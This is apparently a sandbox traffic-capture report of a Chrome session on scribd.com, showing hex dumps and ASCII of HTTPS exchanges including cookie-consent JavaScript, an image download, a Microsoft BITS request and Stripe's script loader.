                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:18 UTC16384INData Raw: 6e 20 65 3d 3e 7b 76 61 72 20 6f 3d 65 2e 74 61 72 67 65 74 2e 63 68 65 63 6b 65 64 3b 72 2e 64 69 73 70 61 74 63 68 28 4f 65 2e 5a 50 2e 73 65 74 43 6f 6e 73 65 6e 74 28 74 2c 6f 3f 69 2e 65 4a 3a 69 2e 44 76 29 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 49 74 28 65 29 7b 76 61 72 7b 63 61 74 65 67 6f 72 79 3a 74 2c 70 72 65 66 69 78 3a 72 2c 73 74 6f 72 65 3a 7b 67 65 74 53 74 61 74 65 3a 6f 7d 7d 3d 65 2c 6e 3d 6f 28 29 2c 61 3d 28 30 2c 57 2e 51 63 29 28 6e 29 2c 63 3d 28 30 2c 57 2e 6d 72 29 28 6e 2c 74 29 2c 73 3d 28 30 2c 57 2e 4c 50 29 28 6e 2c 74 29 2c 6c 3d 61 26 26 22 22 2e 63 6f 6e 63 61 74 28 72 2c 22 64 72 61 77 65 72 2d 74 6f 67 67 6c 65 2d 2d 63 61 74 65 67 6f 72 79 5f 22 29 2e 63 6f 6e 63 61 74 28 74 2c 22 2d 2d 64 65 73 63 72 69 70 74 69 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: n e=>{var o=e.target.checked;r.dispatch(Oe.ZP.setConsent(t,o?i.eJ:i.Dv))}};function It(e){var{category:t,prefix:r,store:{getState:o}}=e,n=o(),a=(0,W.Qc)(n),c=(0,W.mr)(n,t),s=(0,W.LP)(n,t),l=a&&"".concat(r,"drawer-toggle--category_").concat(t,"--descriptio
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:18 UTC16384INData Raw: 6c 65 6d 65 6e 74 3a 22 6d 65 73 73 61 67 65 22 2c 6d 6f 64 69 66 69 65 72 73 3a 7b 65 6c 65 6d 65 6e 74 3a 7b 64 69 73 61 62 6c 65 64 3a 6e 7d 7d 7d 29 7d 2c 66 3d 7b 61 6e 61 6c 79 74 69 63 73 3a 69 2e 67 6f 2e 74 72 61 6e 73 6c 61 74 65 28 22 63 61 74 65 67 6f 72 69 65 73 2e 41 4e 41 4c 59 54 49 43 53 2e 6c 61 62 65 6c 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 3a 69 2e 67 6f 2e 74 72 61 6e 73 6c 61 74 65 28 22 63 61 74 65 67 6f 72 69 65 73 2e 50 45 52 53 4f 4e 41 4c 49 5a 41 54 49 4f 4e 2e 6c 61 62 65 6c 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6d 61 72 6b 65 74 69 6e 67 3a 69 2e 67 6f 2e 74 72 61 6e 73 6c 61 74 65 28 22 63 61 74 65 67 6f 72 69 65 73 2e 4d 41 52 4b 45 54 49 4e 47 2e 6c 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lement:"message",modifiers:{element:{disabled:n}}})},f={analytics:i.go.translate("categories.ANALYTICS.label").toLowerCase(),personalization:i.go.translate("categories.PERSONALIZATION.label").toLowerCase(),marketing:i.go.translate("categories.MARKETING.la
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:18 UTC16384INData Raw: 6f 6e 28 65 2c 74 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 65 29 7b 76 61 72 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 2c 6f 3d 41 72 72 61 79 2e 66 72 6f 6d 28 51 6e 28 65 29 29 2e 66 69 6c 74 65 72 28 7a 6e 29 5b 30 5d 3b 74 72 79 7b 6f 2e 66 6f 63 75 73 28 4a 6e 29 7d 63 61 74 63 68 28 6c 29 7b 74 26 26 74 2e 66 6f 63 75 73 28 4a 6e 29 7d 72 65 74 75 72 6e 20 72 7d 7d 2c 58 6e 3d 7b 66 69 72 73 74 3a 22 6c 61 73 74 22 2c 6c 61 73 74 3a 22 66 69 72 73 74 22 7d 2c 65 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 22 22 3b 72 65 74 75 72 6e 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: on(e,t){if(null!==e){var r=document.activeElement,o=Array.from(Qn(e)).filter(zn)[0];try{o.focus(Jn)}catch(l){t&&t.focus(Jn)}return r}},Xn={first:"last",last:"first"},ea=function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"";return func
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:18 UTC16384INData Raw: 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 64 6f 63 75 6d 65 6e 74 2c 22 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 22 2c 5a 69 28 5a 69 28 7b 7d 2c 43 69 2e 49 50 29 2c 7b 7d 2c 7b 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 74 3d 6e 65 77 20 41 72 72 61 79 28 65 29 2c 72 3d 30 3b 72 3c 65 3b 72 2b 2b 29 74 5b 72 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 76 61 72 20 6f 3d 43 69 2e 49 50 2e 76 61 6c 75 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 74 29 3b 72 65 74 75 72 6e 20 6f 2e 74 61 67 4e 61 6d 65 2c 6f 7d 7d 29 29 3b 76 61 72 20 4d 69 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 63 6c 61 73 73 20 46 69 7b 67 65 74 20 6d 69 64 64 6c 65 77 61 72 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: );Object.defineProperty(document,"createElement",Zi(Zi({},Ci.IP),{},{value:function(){for(var e=arguments.length,t=new Array(e),r=0;r<e;r++)t[r]=arguments[r];var o=Ci.IP.value.apply(this,t);return o.tagName,o}}));var Mi=new WeakMap;class Fi{get middleware
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:18 UTC16384INData Raw: 77 69 64 67 65 74 2d 2d 70 6f 73 69 74 69 6f 6e 5f 6c 65 66 74 7b 6c 65 66 74 3a 31 32 70 78 7d 2e 6f 73 61 6e 6f 2d 63 6d 2d 77 69 64 67 65 74 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 73 6f 6c 69 64 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2e 32 72 65 6d 7d 2e 6f 73 61 6e 6f 2d 63 6d 2d 77 69 64 67 65 74 3a 66 6f 63 75 73 2c 2e 6f 73 61 6e 6f 2d 63 6d 2d 77 69 64 67 65 74 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 31 29 7d 2e 6f 73 61 6e 6f 2d 63 6d 2d 77 69 64 67 65 74 2d 2d 68 69 64 64 65 6e 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 6d 73 2c 30 6d 73 2c 2e 34 73 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 6f 73 61 6e 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: widget--position_left{left:12px}.osano-cm-widget:focus{outline:solid;outline-offset:.2rem}.osano-cm-widget:focus,.osano-cm-widget:hover{opacity:1;transform:scale(1.1)}.osano-cm-widget--hidden{opacity:0;transition-delay:0ms,0ms,.4s;visibility:hidden}.osano
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:18 UTC16384INData Raw: 29 3d 3e 4f 62 6a 65 63 74 2e 6b 65 79 73 28 4f 28 65 2c 74 29 29 2e 6d 61 70 28 28 65 3d 3e 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 29 29 7c 7c 5b 5d 2c 50 3d 28 65 2c 74 29 3d 3e 28 30 2c 63 2e 55 32 29 28 70 28 65 2c 74 29 2c 22 76 65 6e 64 6f 72 4f 70 74 6f 75 74 73 22 29 7c 7c 7b 7d 2c 5f 3d 28 65 2c 74 29 3d 3e 28 30 2c 63 2e 55 32 29 28 70 28 65 2c 74 29 2c 22 76 65 6e 64 6f 72 4c 69 73 74 56 65 72 73 69 6f 6e 22 29 2c 53 3d 28 65 2c 74 29 3d 3e 7b 76 61 72 7b 74 79 70 65 3a 72 2c 69 64 3a 6f 7d 3d 74 2c 6e 3d 4f 28 65 29 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 28 6e 29 2e 66 69 6c 74 65 72 28 28 65 3d 3e 28 65 5b 22 22 2e 63 6f 6e 63 61 74 28 72 29 5d 7c 7c 5b 5d 29 2e 69 6e 63 6c 75 64 65 73 28 4e 75 6d 62 65 72 28 6f 29
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )=>Object.keys(O(e,t)).map((e=>parseInt(e,10)))||[],P=(e,t)=>(0,c.U2)(p(e,t),"vendorOptouts")||{},_=(e,t)=>(0,c.U2)(p(e,t),"vendorListVersion"),S=(e,t)=>{var{type:r,id:o}=t,n=O(e);return Object.values(n).filter((e=>(e["".concat(r)]||[]).includes(Number(o)
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:18 UTC16384INData Raw: 76 61 72 7b 6e 6f 64 65 3a 72 7d 3d 28 30 2c 6e 2e 69 5a 29 28 65 29 7c 7c 7b 6e 6f 64 65 3a 65 7d 2c 6f 3d 6d 2e 67 65 74 28 72 29 7c 7c 7b 7d 3b 65 26 26 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 7c 7c 7b 7d 29 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 76 61 72 5b 72 2c 6e 5d 3d 74 2c 7b 64 65 73 63 72 69 70 74 6f 72 3a 61 7d 3d 6e 2c 5b 69 2c 63 2c 73 5d 3d 6f 5b 22 22 2e 63 6f 6e 63 61 74 28 72 29 5d 7c 7c 5b 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 69 29 69 66 28 73 29 70 2e 6c 6b 2e 76 61 6c 75 65 2e 63 61 6c 6c 28 65 2c 72 29 3b 65 6c 73 65 20 74 72 79 7b 61 2e 73 65 74 2e 63 61 6c 6c 28 65 2c 69 29 7d 63 61 74 63 68 28 6c 29 7b 64 2e 6c 6b 2e 76 61 6c 75 65 2e 63 61 6c 6c 28 65 2c 72 2c 69 29 7d 7d 29 29 2c 65 3d 3d 3d 72 26 26 6d 2e 64 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: var{node:r}=(0,n.iZ)(e)||{node:e},o=m.get(r)||{};e&&Object.entries(t||{}).forEach((t=>{var[r,n]=t,{descriptor:a}=n,[i,c,s]=o["".concat(r)]||[];if(void 0!==i)if(s)p.lk.value.call(e,r);else try{a.set.call(e,i)}catch(l){d.lk.value.call(e,r,i)}})),e===r&&m.de


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        7192.168.2.1649714151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:17 UTC619OUTGET /975ow02iyodmurb1/images/1-4596bc3e1d.jpg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: html.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:17 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 4836
                                                                                                                                                                                                                                                                                                                                                                                        Content-Disposition: inline;filename=1-4596bc3e1d.jpg
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "+aJAxg/woEJ5J4GOCivxSDJQ4yIHGDAJ1hzSrXDJmW4"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=26973 idim=904x639 ifmt=jpeg ofsz=4836 odim=904x639 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010210
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Id-2: +X7FE2PT02ywPcUot2QMZ8p/5/FzH6dCwREMKVwBualNzBNbGJjJxn3z7slGYRFRZ4C6Q4Bpr6w=
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Request-Id: 0DEPYP89CSQWYNKJ
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Version-Id: DqeMoZzx9dzpVE5jWUq7pdD0_6ojOY5Z
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100077-IAD, cache-ewr-kewr1740025-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 68, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522358.803355,VS0,VE8
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:17 UTC1378INData Raw: 52 49 46 46 dc 12 00 00 57 45 42 50 56 50 38 20 d0 12 00 00 90 b8 00 9d 01 2a 88 03 7f 02 3e 9d 4e a3 4d a5 a4 23 22 20 74 08 58 b0 13 89 67 6e e1 68 2f 05 f4 d0 2f fe d7 f0 d2 2b f1 57 dd e4 a5 79 fe 45 9e 70 c9 06 f9 9f 33 0e 7e f2 1b fa 81 ee 2b f4 5f b0 5f eb 27 4a 2f 30 1f b9 1e af 5f f0 3d 6f 7f 6b f5 0a fe ab d4 91 e8 61 e5 d9 ec fb fb b5 95 1f e4 ef f0 1d b3 ff b7 e5 a0 94 4d c6 ff 28 fb 8b fc 3e 15 78 01 7a af 76 2c 00 75 45 ea b2 a9 65 00 3c 54 7f f0 f2 fb f5 b7 b0 97 49 80 4a 53 87 0e 1c 38 70 e1 c3 88 ef bc be a2 99 4e 1c 38 70 e1 c3 87 0e 1c 38 70 e1 c3 87 0e 1c 38 76 7a 28 cf 74 bb 64 41 9b b9 f2 bf 3a 74 e9 d3 a7 4e 9d 3a 74 e9 d3 a7 4e a2 76 81 19 c1 62 c7 6e 5b 37 c6 aa 9c 38 70 e1 c3 87 0e 1c 38 70 e1 c3 87 0e 1c 38 76 7a 28 cf 74 87 85
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFFWEBPVP8 *>NM#" tXgnh//+WyEp3~+__'J/0_=okaM(>xzv,uEe<TIJS8pN8p8p8vz(tdA:tN:tNvbn[78p8p8vz(t
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:17 UTC1378INData Raw: d1 c0 66 f1 9c 3f c8 ca 3b 97 05 db 01 d8 c4 ce 61 a2 08 14 44 43 a2 24 69 73 50 c7 8a 53 a2 db 01 19 78 b9 1d 6d 57 3c 93 95 f9 d3 a7 4e 9b 18 42 71 4c fd 39 e2 90 3f 3c 73 7d c2 73 53 df 0b 0e 31 42 e6 91 c3 dc e3 a2 7b d2 40 81 02 04 08 0f 8b b0 fd 41 9e 9f 05 d7 29 c3 87 0e 1c 38 70 e1 c3 87 0e 1d 9e ac ee 90 66 29 62 3b 3e 2f 45 68 33 01 6a 41 62 c5 8b 16 2c 58 b1 62 c5 30 00 fe f7 ae cb b2 97 fe e5 7f a7 7b be fb de 5f ad 1f ce 1b e1 88 2f 36 08 30 b9 ae 4d 84 14 06 ac 10 8a 4b 23 f5 47 a9 d3 c8 42 4a 23 bd f1 ea 33 5c 0f 80 d3 05 a3 97 5f e5 75 39 a5 8c 03 fc 5d 48 1b 20 a5 47 e0 d6 c8 59 fb 7f 48 51 08 0d 4a aa fe 90 a2 10 1a 95 55 fd 21 44 20 35 2a ab fa 42 88 40 6a 55 62 63 79 96 52 41 07 ed 2d ae 68 18 97 bc 6a f7 05 3a 59 99 40 00 00 10 96 c6
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: f?;aDC$isPSxmW<NBqL9?<s}sS1B{@A)8pf)b;>/Eh3jAb,Xb0{_/60MK#GBJ#3\_u9]H GYHQJU!D 5*B@jUbcyRA-hj:Y@
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:17 UTC1378INData Raw: 80 97 a9 34 a3 ab 79 8b 07 fa 60 c9 82 63 0b 54 55 c8 23 2c cf eb f0 87 a6 e5 9e 10 9f b9 bb 2c 99 35 09 2e 6e 87 8a f7 22 39 18 5a 23 36 cb d4 00 f7 64 c7 46 2a 0b ad b6 fd c4 1b 03 9b 97 d6 c9 ad 69 3b e7 d4 c2 5e ce 1c 3f 9b d1 8a 42 a3 92 02 e8 42 ac ae e3 09 80 d8 b3 76 68 d0 92 6b d4 4a 92 f5 2e f2 36 8e b3 6b 7c b9 31 9c f8 d6 70 20 00 04 e0 5d e3 db 30 cd 17 9d 3a 1c 22 40 9d c0 7e a9 63 23 89 1f d6 3f f0 7c 05 9c b6 ff 99 45 86 f5 e2 49 ef 7e 27 1b 29 38 d5 bf e2 55 b6 0e 1e c3 6e ec c0 b6 33 f6 ac 1b 83 70 ae be ee 21 92 00 67 85 56 32 1a a6 87 14 42 32 06 c7 da a2 5a cc 2d b5 16 39 52 35 69 20 7d c4 ff e2 b5 9d 58 f2 83 de 4d 5d cb b9 91 23 2e d4 fd e9 a7 5b 90 01 17 18 a1 bb 0e 47 7e 4a 43 95 74 17 3f 2f aa 73 ac 1f 9b 6d 74 af 09 37 8f 89 d3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 4y`cTU#,,5.n"9Z#6dF*i;^?BBvhkJ.6k|1p ]0:"@~c#?|EI~')8Un3p!gV2B2Z-9R5i }XM]#.[G~JCt?/smt7
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:17 UTC702INData Raw: eb ce 29 87 ab 66 37 94 7e 7e 5f dd 27 55 3a 9f 2d 39 f5 84 d2 c9 fb 70 c5 94 6e 1b b1 fa f8 84 54 42 b2 30 9e 86 07 a6 ca 00 a9 d6 1b df eb 01 33 67 60 40 d2 ff 74 3d d7 49 02 b7 ed 1c e9 34 52 54 f8 74 69 ae 82 4e 12 bb 86 f1 73 61 80 4f 14 52 e5 c8 d4 c0 41 14 56 28 ee bc 2e 46 ac 75 4b 3e 5c 6c fc c5 ab fa a8 e2 e0 31 bf c4 e7 a0 71 b2 c0 27 57 48 25 7b 73 73 f7 38 b5 0e 3e 1d b0 3b fc 3a 4c 50 62 ac 3a f6 1a 6b 08 2f d7 3e 5a eb 6c 92 33 9b 7c 7b 16 b4 bf d3 84 81 5a df ed 01 23 d3 1c 3f ac 8c 24 05 e6 3f 05 06 0e 5f 6d 44 eb 4b 06 c9 5b 79 06 a0 16 97 f0 5a 99 ec ee 77 0d 2c 4e ef 69 46 34 05 3a 83 4a 66 3f d4 12 59 87 f1 c7 ae ce 83 ba 21 a3 5b 07 81 0d a1 69 ce 1f 8a 0b 00 fa f2 9e f0 a6 04 42 6b 7a b2 19 38 f2 7d 7f 2a 3c 78 16 50 06 b1 6d a6 b4
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )f7~~_'U:-9pnTB03g`@t=I4RTtiNsaORAV(.FuK>\l1q'WH%{ss8>;:LPb:k/>Zl3|{Z#?$?_mDK[yZw,NiF4:Jf?Y![iBkz8}*<xPm


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        8192.168.2.164972023.218.208.109443
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:17 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:18 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                        Server: Kestrel
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                                                                        X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                                                                        X-OSID: 2
                                                                                                                                                                                                                                                                                                                                                                                        X-CID: 2
                                                                                                                                                                                                                                                                                                                                                                                        X-CCC: GB
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=125974
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        X-CID: 2


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        9192.168.2.1649722216.137.52.214436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:18 UTC514OUTGET /v3/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: js.stripe.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC714INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 708943
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 19:08:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Server: Cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "faa462b5b8abafb19f4c7edaa7b46aaa"
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 9e5f1a91c47416623ea43cb662694d38.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: MRS52-P2
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: PO2JnqrK19o8cZ_6uorCC_GvakQWS6h6ccpoL9xhFOIbSjRt7rn_iQ==
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC16384INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 76 61 72 20 6e 3d 6f 5b 74 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6e 29 72 65 74 75 72 6e 20 6e 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 6f 5b 74 5d 3d 7b 69 64 3a 74 2c 6c 6f 61 64 65 64 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 72 5b 74 5d 28 69 2c 69 2e 65 78 70 6f 72 74 73 2c 65 29 2c 69 2e 6c 6f 61 64 65 64 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 74 2c 6e 2c 72 3d 7b 37 32 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 6c 2e 6c 65 6e 67 74 68 7c 7c 28 61 28 29 2c 21 30 29 2c 6c 5b 6c 2e 6c 65 6e 67 74 68 5d 3d 65 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !function(){function e(t){var n=o[t];if(void 0!==n)return n.exports;var i=o[t]={id:t,loaded:!1,exports:{}};return r[t](i,i.exports,e),i.loaded=!0,i.exports}var t,n,r={723:function(e,t,n){"use strict";function r(e){l.length||(a(),!0),l[l.length]=e}function
